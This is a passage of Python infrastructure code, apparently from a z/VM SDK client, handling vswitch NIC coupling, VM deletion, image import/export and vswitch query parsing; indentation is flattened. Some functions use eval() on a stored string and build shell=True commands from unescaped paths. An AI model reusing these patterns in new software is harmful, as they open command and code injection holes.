raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % vswitch
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2788) or
(error.results['rs'] == 2848) or
(error.results['rs'] == 3034) or
(error.results['rs'] == 6011))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
else:
raise error
def _couple_inactive_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 412) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
raise error
def _couple_nic(self, userid, vdev, vswitch_name,
active=False):
"""Couple NIC to vswitch by adding vswitch into user direct."""
if active:
self._is_active(userid)
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Connect_Vswitch',
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
results1 = err1.results
msg1 = err1.format_message()
if ((results1 is not None) and
(results1['rc'] == 204) and
(results1['rs'] == 20)):
LOG.warning("Virtual device %s already connected "
"on the active guest system", vdev)
else:
persist_OK = True
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect_DM',
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results2 = err2.results
msg2 = err2.format_message()
if ((results2 is not None) and
(results2['rc'] == 212) and
(results2['rs'] == 32)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._couple_active_exception(err1, userid, vdev,
vswitch_name)
else:
raise exception.SDKNetworkOperationError(rs=3,
nic=vdev, vswitch=vswitch_name,
couple_err=msg1, revoke_err=msg2)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
vswitch_name)
msg = ('Couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s successfully'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
def couple_nic_to_vswitch(self, userid, nic_vdev,
vswitch_name, active=False, vlan_id=-1):
"""Couple nic to vswitch."""
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Connect nic %s to switch %s %s",
nic_vdev, vswitch_name, msg)
# Previously we used Virtual_Network_Adapter_Connect_Vswitch_DM,
# but due to a limitation in SMAPI there is no way to add a VLAN ID
# that way, so we have to build the user direct entry ourselves
msg = ('Start to couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s with vlan %(vlan_id)s:'
% {'vdev': nic_vdev, 'vm': userid, 'vsw': vswitch_name,
'vlan_id': vlan_id})
LOG.info(msg)
user_direct = self.get_user_direct(userid)
new_user_direct = []
nicdef = "NICDEF %s" % nic_vdev
for ent in user_direct:
if len(ent) > 0:
new_user_direct.append(ent)
if ent.upper().startswith(nicdef):
# vlan_id < 0 means no VLAN ID given
v = nicdef
if vlan_id < 0:
v += " LAN SYSTEM %s" % vswitch_name
else:
v += " LAN SYSTEM %s VLAN %s" % (vswitch_name, vlan_id)
new_user_direct.append(v)
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
# Replace user directory
try:
self._replace_user_direct(userid, new_user_direct)
except exception.SDKSMTRequestFailed as e:
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
self._couple_nic(userid, nic_vdev, vswitch_name, active=active)
def _uncouple_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=12,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _uncouple_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=13,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def _uncouple_nic(self, userid, vdev, active=False):
"""Uncouple NIC from vswitch"""
if active:
self._is_active(userid)
msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Disconnect_DM",
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 212) and
(results['rs'] == 32)):
LOG.warning("Virtual device %s is already disconnected "
"in the guest's user direct", vdev)
else:
LOG.error("Failed to uncouple nic %s in the guest's user "
"direct, error: %s" % (vdev, emsg))
self._uncouple_inactive_exception(err, userid, vdev)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
None)
# The instance must be active, or this call will fail
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect',
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 204) and
(results['rs'] == 48)):
LOG.warning("Virtual device %s is already "
"disconnected on the active "
"guest system", vdev)
else:
LOG.error("Failed to uncouple nic %s on the active "
"guest system, error: %s" % (vdev, emsg))
self._uncouple_active_exception(err, userid, vdev)
msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def uncouple_nic_from_vswitch(self, userid, nic_vdev,
active=False):
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Disconnect nic %s with network %s",
nic_vdev, msg)
self._uncouple_nic(userid, nic_vdev, active=active)
def delete_userid(self, userid):
rd = ' '.join(('deletevm', userid, 'directory'))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if err.results['rc'] == 400 and err.results['rs'] == 4:
# guest vm definition not found
LOG.debug("The guest %s does not exist." % userid)
return
# Ignore the "delete VM not finished" error
if err.results['rc'] == 596 and err.results['rs'] == 6831:
# 596/6831 means delete VM not finished yet
LOG.warning("The guest %s deleted with 596/6831" % userid)
return
msg = "SMT error: %s" % err.format_message()
raise exception.SDKSMTRequestFailed(err.results, msg)
def delete_vm(self, userid):
self.delete_userid(userid)
# remove userid from smapi namelist
self.namelist_remove(zvmutils.get_namelist(), userid)
# revoke userid from vswitch
action = "revoke id %s authority from vswitch" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
switch_info = self._NetDbOperator.switch_select_record_for_userid(
userid)
switch_list = set()
for item in switch_info:
switch_list.add(item['switch'])
for item in switch_list:
if item is not None:
self.revoke_user_from_vswitch(item, userid)
# cleanup db record from network table
action = "delete network record for user %s" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._NetDbOperator.switch_delete_record_for_userid(userid)
# TODO: cleanup db record from volume table
pass
# cleanup persistent folder for guest
self._pathutils.remove_guest_path(userid)
# cleanup db record from guest table
action = "delete guest %s from database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.delete_guest_by_userid(userid)
def execute_cmd(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
with zvmutils.log_and_reraise_smt_request_failed(action='execute '
'command on vm via iucv channel'):
results = self._request(requestData)
ret = results['response']
return ret
def execute_cmd_direct(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
results = self._smt.request(requestData)
return results
def image_import(self, image_name, url, image_meta, remote_host=None):
"""Import the image specified in url to SDK image repository, and
create a record in image db, the imported images are located in
image_repository/prov_method/os_version/image_name/, for example,
/opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100"""
image_info = []
try:
image_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image record %s doens't exist in SDK image datebase,"
" will import the image and create record now" % image_name)
LOG.info(msg)
# Ensure the specified image does not already exist in the image DB
if image_info:
msg = ("The image name %s has already exist in SDK image "
"database, please check if they are same image or consider"
" to use a different image name for import" % image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=13, img=image_name)
try:
image_os_version = image_meta['os_version'].lower()
target_folder = self._pathutils.create_import_image_repository(
image_os_version, const.IMAGE_TYPE['DEPLOY'],
image_name)
except Exception as err:
msg = ('Failed to create repository to store image %(img)s with '
'error: %(err)s, please make sure there are enough space '
'on zvmsdk server and proper permission to create the '
'repository' % {'img': image_name,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
if self.is_rhcos(image_os_version):
image_disk_type = image_meta.get('disk_type')
if ((image_disk_type is None) or
((image_disk_type.upper() != "DASD" and
image_disk_type.upper() != "SCSI"))):
msg = ('Disk type is required for RHCOS image import, '
'the value should be DASD or SCSI')
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
else:
comments = {'disk_type': image_disk_type.upper()}
comments = str(comments)
else:
comments = None
try:
import_image_fn = urlparse.urlparse(url).path.split('/')[-1]
import_image_fpath = '/'.join([target_folder, import_image_fn])
self._scheme2backend(urlparse.urlparse(url).scheme).image_import(
image_name, url,
import_image_fpath,
remote_host=remote_host)
# Check md5 after import to ensure the image was imported correctly
# TODO: change to query the image name in the DB
expect_md5sum = image_meta.get('md5sum')
real_md5sum = self._get_md5sum(import_image_fpath)
if expect_md5sum and expect_md5sum != real_md5sum:
msg = ("The md5sum after import is not same as source image,"
" the image has been broken")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=4)
# After importing to the image repository, figure out whether the
# image is a single-disk or a multiple-disk image. If it is a
# multiple-disk image, extract it; if it is a single-disk image,
# rename it to match the specific vdev
# TODO: (nafei) use sub-function to check the image type
image_type = 'rootonly'
if image_type == 'rootonly':
final_image_fpath = '/'.join([target_folder,
CONF.zvm.user_root_vdev])
os.rename(import_image_fpath, final_image_fpath)
elif image_type == 'alldisks':
# For a multiple-disk image, extract it; after extraction the
# content under the image folder looks like: 0100, 0101, 0102.
# Then remove the image file 0100-0101-0102.tgz
pass
# TODO: put multiple disk image into consideration, update the
# disk_size_units and image_size db field
if not self.is_rhcos(image_os_version):
disk_size_units = self._get_disk_size_units(final_image_fpath)
else:
disk_size_units = self._get_disk_size_units_rhcos(
final_image_fpath)
image_size = self._get_image_size(final_image_fpath)
# TODO: update the real_md5sum field to include each disk image
self._ImageDbOperator.image_add_record(image_name,
image_os_version,
real_md5sum,
disk_size_units,
image_size,
image_type,
comments=comments)
LOG.info("Image %s is import successfully" % image_name)
except Exception:
# Cleanup the image from image repository
self._pathutils.clean_temp_folder(target_folder)
raise
def image_export(self, image_name, dest_url, remote_host=None):
"""Export the specific image to remote host or local file system
:param image_name: image name that can be uniquely identify an image
:param dest_path: the location to store exported image, eg.
/opt/images, the image will be stored in folder
/opt/images/
:param remote_host: the server that export image to, the format is
username@IP eg. nova@192.168.99.1, if remote_host is
None, it means the image will be stored in local server
:returns a dictionary that contains the exported image info
{
'image_name': the image_name that exported
'image_path': the image_path after exported
'os_version': the os version of the exported image
'md5sum': the md5sum of the original image
'comments': the comments of the original image
}
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
image_type = image_info[0]['type']
# TODO: (nafei) according to image_type, detect image exported path
# For a multiple-disk image, make the tgz first, then specify the
# source_path to be something like: 0100-0101-0102.tgz
if image_type == 'rootonly':
source_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
image_info[0]['imageosdistro'],
image_name,
CONF.zvm.user_root_vdev])
else:
pass
self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export(
source_path, dest_url,
remote_host=remote_host)
# TODO: (nafei) for multiple disks image, update the expect_dict
# to be the tgz's md5sum
export_dict = {'image_name': image_name,
'image_path': dest_url,
'os_version': image_info[0]['imageosdistro'],
'md5sum': image_info[0]['md5sum'],
'comments': image_info[0]['comments']}
LOG.info("Image %s export successfully" % image_name)
return export_dict
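# Caller-side sketch of the dictionary returned by image_export() above
# (the image name and paths are hypothetical, field names mirror the
# docstring):
#     {'image_name': 'rhel7-img',
#      'image_path': 'file:///opt/images/rhel7-img',
#      'os_version': 'rhel7.2',
#      'md5sum': '<md5 of the original image>',
#      'comments': None}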
def _get_image_disk_size_units(self, image_path):
""" Return a comma separated string to indicate the image disk size
and units for each image disk file under image_path
For single disk image , it looks like: 0100=3338:CYL
For multiple disk image, it looks like:
0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL"""
pass
def _get_disk_size_units(self, image_path):
command = 'hexdump -n 48 -C %s' % image_path
(rc, output) = zvmutils.execute(command)
LOG.debug("hexdump result is %s" % output)
if rc:
msg = ("Error happened when executing command hexdump with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=5)
try:
root_disk_size = int(output[144:156])
disk_units = output[220:223]
root_disk_units = ':'.join([str(root_disk_size), disk_units])
except ValueError:
msg = ("Image file at %s is missing built-in disk size "
"metadata, it was probably not captured by SDK" %
image_path)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=6)
if 'FBA' not in output and 'CKD' not in output:
raise exception.SDKImageOperationError(rs=7)
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_disk_size_units_rhcos(self, image_path):
command = "fdisk -b 4096 -l %s | head -2 | awk '{print $5}'" % (
image_path)
rc = 0
output = ""
try:
# shell must be set to True because this is a shell command with
# a pipeline, so the zvmutils.execute function can not be used here
output = subprocess.check_output(command, shell=True,
stderr=subprocess.STDOUT)
output = bytes.decode(output)
except subprocess.CalledProcessError as err:
rc = err.returncode
output = err.output
except Exception as err:
err_msg = ('Command "%s" Error: %s' % (' '.join(command),
str(err)))
raise exception.SDKInternalError(msg=err_msg)
if rc or output.strip('1234567890*\n'):
msg = ("Error happened when executing command fdisk with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
image_size = output.split()[0]
try:
cyl = (float(image_size)) / 737280
cyl = str(int(math.ceil(cyl)))
except Exception:
msg = ("Failed to convert %s to a number of cylinders."
% image_size)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
disk_units = "CYL"
root_disk_units = ':'.join([str(cyl), disk_units])
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
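# Worked example of the cylinder conversion above (assuming a hypothetical
# RHCOS image of 3,221,225,472 bytes reported by fdisk):
#     cyl = 3221225472 / 737280 = 4369.07 -> ceil -> 4370
# so the returned root_disk_units string would be "4370:CYL".
# 737280 presumably corresponds to 12 blocks/track * 15 tracks/cylinder
# * 4096 bytes on a 3390 DASD.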
def _get_image_size(self, image_path):
"""Return disk size in bytes"""
command = 'du -b %s' % image_path
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when executing command du -b with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
size = output.split()[0]
return size
def _get_image_path_by_name(self, image_name):
try:
target_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
# TODO: (nafei) Handle multiple disks image deploy
image_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
target_info[0]['imageosdistro'],
image_name])
return image_path
def _scheme2backend(self, scheme):
try:
return {
"file": FilesystemBackend,
"http": HTTPBackend,
# "https": HTTPSBackend
}[scheme]
except KeyError:
msg = ("No backend found for '%s'" % scheme)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=2, schema=scheme)
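# Example of the scheme dispatch above (an illustrative sketch, not
# additional API):
#     _scheme2backend('file')  -> FilesystemBackend  (scp / local copy)
#     _scheme2backend('http')  -> HTTPBackend        (multi-threaded download)
#     _scheme2backend('ftp')   -> raises SDKImageOperationError(rs=2)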
def _get_md5sum(self, fpath):
"""Calculate the md5sum of the specific image file"""
try:
current_md5 = hashlib.md5()
if isinstance(fpath, six.string_types) and os.path.exists(fpath):
with open(fpath, "rb") as fh:
for chunk in self._read_chunks(fh):
current_md5.update(chunk)
elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or
isinstance(fpath, IOBase)):
for chunk in self._read_chunks(fpath):
current_md5.update(chunk)
else:
return ""
return current_md5.hexdigest()
except Exception:
msg = ("Failed to calculate the image's md5sum")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=3)
def _read_chunks(self, fh):
fh.seek(0)
chunk = fh.read(CHUNKSIZE)
while chunk:
yield chunk
chunk = fh.read(CHUNKSIZE)
else:
fh.seek(0)
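# Minimal sketch of how _get_md5sum()/_read_chunks() cooperate: the file
# is hashed in CHUNKSIZE pieces so that large images are never loaded
# into memory at once. Roughly equivalent standalone code (names here
# are illustrative only):
#     md5 = hashlib.md5()
#     with open(fpath, 'rb') as fh:
#         for chunk in iter(lambda: fh.read(CHUNKSIZE), b''):
#             md5.update(chunk)
#     digest = md5.hexdigest()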
def image_delete(self, image_name):
# Delete image file
try:
self._delete_image_file(image_name)
# Delete image record from db
self._ImageDbOperator.image_delete_record(image_name)
except exception.SDKImageOperationError as err:
results = err.results
if ((results['rc'] == 300) and (results['rs'] == 20)):
LOG.warning("Image %s does not exist", image_name)
return
else:
LOG.error("Failed to delete image %s, error: %s" %
(image_name, err.format_message()))
raise
msg = ('Delete image %s successfully' % image_name)
LOG.info(msg)
def _delete_image_file(self, image_name):
image_path = self._get_image_path_by_name(image_name)
self._pathutils.clean_temp_folder(image_path)
def _get_image_last_access_time(self, image_name, raise_exception=True):
"""Get the last access time of the image."""
image_file = os.path.join(self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev)
if not os.path.exists(image_file):
if raise_exception:
msg = 'Failed to get time stamp of image:%s' % image_name
LOG.error(msg)
raise exception.SDKImageOperationError(rs=23, img=image_name)
else:
# An invalid timestamp
return -1
atime = os.path.getatime(image_file)
return atime
def image_query(self, image_name=None):
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
# the database may be empty, so return an empty list here
return []
# if image_name is not None, there is only one record
if image_name:
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
image_info[0]['last_access_time'] = last_access_time
else:
for item in image_info:
image_name = item['imagename']
# set raise_exception to False so that a single failure does
# not stop processing the remaining items in the list
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
item['last_access_time'] = last_access_time
return image_info
def image_get_root_disk_size(self, image_name):
"""Return the root disk units of the specified image
image_name: the unique image name in db
Return the disk units in format like 3339:CYL or 467200:BLK
"""
image_info = self.image_query(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
disk_size_units = image_info[0]['disk_size_units'].split(':')[0]
return disk_size_units
def image_get_os_distro(self, image_name):
"""
Return the operating system distro of the specified image
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
os_distro = image_info[0]['imageosdistro']
return os_distro
def _get_image_disk_type(self, image_name):
"""
Return image disk type
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if ((image_info[0]['comments'] is not None) and
(image_info[0]['comments'].__contains__('disk_type'))):
image_disk_type = eval(image_info[0]['comments'])['disk_type']
if image_disk_type == 'DASD':
return 'ECKD'
elif image_disk_type == 'SCSI':
return 'SCSI'
else:
return None
else:
return None
def punch_file(self, userid, fn, fclass):
rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" %
{'uid': userid, 'file': fn, 'class': fclass})
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to punch file to userid '%s',"
"error: %s" % (userid, err.format_message()))
raise
finally:
os.remove(fn)
def get_guest_connection_status(self, userid):
'''Get guest vm connection status.'''
rd = ' '.join(('getvm', userid, 'isreachable'))
results = self._request(rd)
if results['rs'] == 1:
return True
else:
return False
def _generate_disk_parmline(self, vdev, fmt, mntdir):
parms = [
'action=' + 'addMdisk',
'vaddr=' + vdev,
'filesys=' + fmt,
'mntdir=' + mntdir
]
parmline = ' '.join(parms)
parmstr = "'" + parmline + "'"
return parmstr
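# Example of the parm string built above (values are illustrative):
#     _generate_disk_parmline('0101', 'ext4', '/mnt/ephemeral0101')
#     -> "'action=addMdisk vaddr=0101 filesys=ext4 mntdir=/mnt/ephemeral0101'"
# i.e. the space-separated key=value pairs wrapped in single quotes, which
# is what aemod_handler() passes on via --invparms.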
def process_additional_minidisks(self, userid, disk_info):
'''Generate and punch the scripts used to process additional disks into
the target vm's reader.
'''
for idx, disk in enumerate(disk_info):
vdev = disk.get('vdev') or self.generate_disk_vdev(
offset = (idx + 1))
fmt = disk.get('format')
mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral',
str(vdev)])
# the mount point of swap partition is swap
if fmt == "swap":
mount_dir = "swap"
disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir)
func_name = '/var/lib/zvmsdk/setupDisk'
self.aemod_handler(userid, func_name, disk_parms)
# trigger do-script
if self.get_power_state(userid) == 'on':
self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start")
def aemod_handler(self, instance_name, func_name, parms):
rd = ' '.join(['changevm', instance_name, 'aemod', func_name,
'--invparms', parms])
action = parms[0] + instance_name
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_user_console_output(self, userid):
# get console into reader
rd = 'getvm %s consoleoutput' % userid
action = 'get console log reader file list for guest vm: %s' % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
resp = self._request(rd)
with zvmutils.expect_invalid_resp_data(resp):
rf_list = resp['response'][0].rpartition(':')[2].strip().split()
# TODO: make sure reader device is online
# via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online'
# 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c'
# 'which udevadm &> /dev/null && udevadm settle || udevsettle'
logs = []
for rf in rf_list:
cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf
rc, output = zvmutils.execute(cmd)
if rc == 0:
logs.append(output)
return ''.join(logs)
def query_vswitch(self, switch_name):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % switch_name
))
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
msg = 'Vswitch %s does not exist' % switch_name
LOG.error(msg)
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
action = "query vswitch details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
vsw_info = {}
with zvmutils.expect_invalid_resp_data():
# ignore user_vlan_id part and jump to the vswitch basic info
idx_end = len(rd_list)
idx = 0
while((idx < idx_end) and
not rd_list[idx].__contains__('switch_name')):
idx = idx + 1
# The next 21 lines contain the vswitch basic info,
# eg, name, type, port_type, vlan_awareness, etc
for i in range(21):
rd = rd_list[idx + i].split(':')
vsw_info[rd[0].strip()] = rd[1].strip()
idx = idx + 21
# Skip the vepa_status
while((idx < idx_end) and
not rd_list[idx].__contains__('real_device_address') and
not rd_list[idx].__contains__('port_num') and
not rd_list[idx].__contains__('adapter_owner')):
idx = idx + 1
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
if value == '(NONE)':
value = 'NONE'
return idx + offset, value
def _parse_dev_status(value):
if value in const.DEV_STATUS.keys():
return const.DEV_STATUS[value]
else:
return 'Unknown'
def _parse_dev_err(value):
if value in const.DEV_ERROR.keys():
return const.DEV_ERROR[value]
else:
return 'Unknown'
# Start to analyse the real devices info
vsw_info['real_devices'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('real_device_address')):
# each rdev has 6 lines' info
idx, rdev_addr = _parse_value(rd_list, idx,
'real_device_address: ')
idx, vdev_addr = _parse_value(rd_list, idx,
'virtual_device_address: ')
idx, controller = _parse_value(rd_list, idx,
'controller_name: ')
idx, port_name = _parse_value(rd_list, idx, 'port_name: ')
idx, dev_status = _parse_value(rd_list, idx,
'device_status: ')
idx, dev_err = _parse_value(rd_list, idx,
'device_error_status ')
vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr,
'controller': controller,
'port_name': port_name,
'dev_status':
_parse_dev_status(
dev_status),
'dev_err': _parse_dev_err(
dev_err)
}
# In some cases there is an error line in the output
# "Error controller_name is NULL!!"; skip this line
if ((idx < idx_end) and
rd_list[idx].__contains__(
'Error controller_name is NULL!!')):
idx += 1
# Start to get the authorized userids
vsw_info['authorized_users'] = {}
while((idx < idx_end) and rd_list[idx].__contains__('port_num')):
# each authorized userid has 6 lines' info at least
idx, port_num = _parse_value(rd_list, idx,
'port_num: ')
idx, userid = _parse_value(rd_list, idx,
'grant_userid: ')
idx, prom_mode = _parse_value(rd_list, idx,
'promiscuous_mode: ')
idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ')
idx, vlan_count = _parse_value(rd_list, idx,
'vlan_count: ')
vlan_ids = []
for i in range(int(vlan_count)):
idx, id = _parse_value(rd_list, idx,
'user_vlan_id: ')
vlan_ids.append(id)
# For a VLAN-unaware vswitch, the smcli query returns
# vlan_count as 1; here we just set the count to 0
if (vsw_info['vlan_awareness'] == 'UNAWARE'):
vlan_count = 0
vlan_ids = []
vsw_info['authorized_users'][userid] = {
'port_num': port_num,
'prom_mode': prom_mode,
'osd_sim': osd_sim,
'vlan_count': vlan_count,
'vlan_ids': vlan_ids
}
# Start to get the connected adapters info
# OWNER_VDEV would be used as the dict key for each adapter
vsw_info['adapters'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('adapter_owner')):
# each adapter has four line info: owner, vdev, macaddr, type
idx, owner = _parse_value(rd_list, idx,
'adapter_owner: ')
idx, vdev = _parse_value(rd_list, idx,
'adapter_vdev: ')
idx, mac = _parse_value(rd_list, idx,
'adapter_macaddr: ')
idx, type = _parse_value(rd_list, idx, 'adapter_type: ')
key = owner + '_' + vdev
vsw_info['adapters'][key] = {
'mac': mac,
'type': type
}
# Todo: analyze and add the uplink NIC info and global member info
def _parse_switch_status(value):
if value in const.SWITCH_STATUS.keys():
return const.SWITCH_STATUS[value]
else:
return 'Unknown'
if 'switch_status' in vsw_info.keys():
vsw_info['switch_status'] = _parse_switch_status(
vsw_info['switch_status'])
return vsw_info
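# Shape of the dictionary returned by query_vswitch() above (a sketch;
# concrete values are hypothetical):
#     {'switch_name': 'VSW1', ...,            # ~21 basic fields parsed first
#      'switch_status': ...,
#      'real_devices': {'1000': {'vdev': ..., 'controller': ...,
#                                'port_name': ..., 'dev_status': ...,
#                                'dev_err': ...}},
#      'authorized_users': {'USER1': {'port_num': ..., 'prom_mode': ...,
#                                     'osd_sim': ..., 'vlan_count': ...,
#                                     'vlan_ids': [...]}},
#      'adapters': {'OWNER_VDEV': {'mac': ..., 'type': ...}}}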
def get_nic_info(self, userid=None, nic_id=None, vswitch=None):
